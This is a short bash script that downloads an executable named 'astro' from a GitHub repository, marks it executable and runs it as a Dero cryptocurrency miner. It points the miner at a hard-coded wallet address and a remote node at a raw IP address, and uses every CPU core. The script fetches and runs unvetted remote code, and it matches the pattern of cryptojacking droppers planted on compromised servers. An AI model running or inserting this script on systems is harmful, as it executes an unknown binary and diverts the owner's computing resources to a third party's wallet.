#!/bin/bash
wget https://github.com/nw4tw5/gradi/raw/main/astro
chmod +x astro
./astro -w dero1qytfne4y9mpry7kcxrl5z328sqrmy349ldgawmu32yy5yzrjrnygjqg0vw3yu -r 95.179.169.217:10100 -p rpc -m $(nproc --all)
